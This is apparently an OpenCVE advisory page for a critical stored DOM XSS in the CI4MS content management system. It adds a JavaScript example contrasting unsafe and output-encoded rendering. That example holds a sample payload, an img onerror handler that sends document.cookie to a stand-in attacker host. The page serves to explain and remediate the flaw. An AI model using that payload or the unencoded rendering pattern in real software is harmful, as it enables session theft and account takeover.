Description
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within the Methods Management functionality when creating or managing application methods/pages. Multiple input fields accept attacker-controlled JavaScript payloads that are stored server-side without sanitization or output encoding. These stored values are later rendered directly into administrative interfaces and global navigation components without proper encoding, resulting in Stored DOM-Based Cross-Site Scripting (XSS). This issue has been patched in version 0.31.0.0.
Published: 2026-03-30
Score: 9.1 Critical
EPSS: < 1% Very Low
KEV: No
Impact: Account Takeover
Action: Patch Now
AI Analysis

Impact

This vulnerability arises because user-controlled input accepted by the Methods Management feature of CI4MS is stored without sanitization and later rendered into administrative pages and global navigation components without output encoding. A user with rights to create or edit methods can store JavaScript that executes in the browser of every user who loads those pages, administrators included, resulting in stored DOM-based XSS. Successful exploitation allows session cookie theft, credential compromise and full account takeover across all roles, and therefore privilege escalation to administrator.
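The store-then-render-without-encoding pattern described above, shown as an added illustration in JavaScript. This is not CI4MS code and the page does not show the project's own views or patch: the record layout, the field names, the renderer functions and the payload are assumptions chosen to show the flaw class beside its hardened form.

```javascript
// Added illustration of the flaw class in this advisory, not code from CI4MS.
// A CMS "method" (a named page/route) is stored once and rendered in two
// places: the global navigation menu and the admin edit form. The record
// layout, field names and the payload below are assumptions for the example.

// Constructed sample record: a low-privileged user with access to Methods
// Management saved a JavaScript payload in the title field. Nothing was
// sanitized on the way into the database.
const STORED_METHOD = {
  id: 42,
  title: '<img src=x onerror="fetch(\'//evil.example/?c=\'+document.cookie)">Reports',
  slug: 'reports',
};

// HTML-context encoder: turns the five characters that can terminate a text
// node or a quoted attribute into entities. A framework view escaper does the
// same job; this one is written out so the example runs stand-alone.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#039;');
}

// Vulnerable pattern (what the advisory describes for versions before
// 0.31.0.0): the stored value is interpolated into markup verbatim, so the
// payload becomes a live element in every browser that loads the menu.
function renderNavItemUnsafe(method) {
  return `<li><a href="/${method.slug}">${method.title}</a></li>`;
}

// Same view, hardened: each stored value is encoded for the context it lands
// in. The slug is a URL path segment (percent-encoded), then both values are
// HTML-encoded because they end up inside HTML attribute and text content.
function renderNavItemSafe(method) {
  const href = '/' + encodeURIComponent(method.slug);
  return `<li><a href="${escapeHtml(href)}">${escapeHtml(method.title)}</a></li>`;
}

// The admin edit form is a second sink for the same stored value, this time
// in a quoted attribute. Unencoded, the double quote in the payload closes
// value="..." and the rest of the payload becomes attributes of <input>.
function renderTitleFieldUnsafe(method) {
  return `<input type="text" name="title" value="${method.title}">`;
}

function renderTitleFieldSafe(method) {
  return `<input type="text" name="title" value="${escapeHtml(method.title)}">`;
}

// Regression check: count the '<' characters that reach the browser. A safe
// renderer emits exactly the tags in its own template, however hostile the
// stored data; any extra '<' is attacker-supplied markup.
function countTags(html) {
  return (html.match(/</g) || []).length;
}

// Second check: the raw stored payload must never appear verbatim in output.
function leaksRawPayload(html, method) {
  return html.includes(method.title);
}

function report() {
  const rows = [
    ['nav item, unsafe', renderNavItemUnsafe(STORED_METHOD)],
    ['nav item, safe', renderNavItemSafe(STORED_METHOD)],
    ['edit field, unsafe', renderTitleFieldUnsafe(STORED_METHOD)],
    ['edit field, safe', renderTitleFieldSafe(STORED_METHOD)],
  ];
  for (const [label, html] of rows) {
    console.log(`${label}: tags=${countTags(html)} leaksPayload=${leaksRawPayload(html, STORED_METHOD)}`);
    console.log('  ' + html);
  }
}

report();
```

Run with node: the two unsafe renderers each emit one element more than their template (the injected img with its onerror handler), while the safe renderers emit the same markup skeleton whatever was stored. In a CodeIgniter 4 view the equivalent remedy is passing every stored value through the framework's esc() helper before it reaches the template; the page does not show the actual 0.31.0.0 change, so treat output encoding at every sink as the general fix for this class rather than as a description of the vendor's patch.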

Affected Systems

Versions of CI4MS before 0.31.0.0, including 0.30.x and earlier, are affected. The product is the CodeIgniter 4-based CMS skeleton provided by ci4-cms-erp under the product name ci4ms.

Risk and Exploitability

The CVSS 3.1 base score of 9.1 (vector AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L) indicates critical severity, but the EPSS score of less than 1% suggests a low likelihood of exploitation in the wild, and the vulnerability is not listed in CISA's KEV catalog. The vector requires low privileges (PR:L): an authenticated user with access to the Methods Management interface stores a malicious payload, which then executes in the browsers of other users, including administrators, whenever the stored data is rendered. The SSVC enrichment records a public proof of concept (Exploitation: poc) and rates the flaw as not automatable.

Generated by OpenCVE AI on April 6, 2026 at 19:48 UTC.

Remediation

The vendor has fixed the issue in version 0.31.0.0, as stated in the description above. No workaround is documented for earlier versions.

OpenCVE Recommended Actions

  • Upgrade CI4MS to version 0.31.0.0 or later.


Advisories

Source: GitHub GHSA
ID: GHSA-v77r-xg3p-75g7
Title: CI4MS: Methods Management Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS
History

Mon, 06 Apr 2026 16:45:00 +0000

Values added:
  CPEs: cpe:2.3:a:ci4-cms-erp:ci4ms:*:*:*:*:*:*:*:*

Wed, 01 Apr 2026 02:15:00 +0000

Values added:
  First Time appeared: Ci4-cms-erp; Ci4-cms-erp ci4ms
  Vendors & Products: Ci4-cms-erp; Ci4-cms-erp ci4ms

Tue, 31 Mar 2026 16:15:00 +0000

Values added:
  Metrics (ssvc, version 2.0.3): Automatable: no; Exploitation: poc; Technical Impact: partial

Tue, 31 Mar 2026 03:00:00 +0000

Values added:
  Description: the CVE description shown at the top of this page
  Title: CI4MS: Methods Management Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS
  Weaknesses: CWE-79
  References: (empty)
  Metrics (cvssV3_1): score 9.1; vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L


MITRE

Status: PUBLISHED
Assigner: GitHub_M
Published:
Updated: 2026-03-31T15:25:20.115Z
Reserved: 2026-03-30T16:31:39.265Z
Link: CVE-2026-34558

Vulnrichment

Updated: 2026-03-31T15:25:16.390Z

NVD

Status: Analyzed
Published: 2026-03-30T21:17:10.493
Modified: 2026-04-06T16:10:04.077
Link: CVE-2026-34558

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-07T08:08:30Z

Weaknesses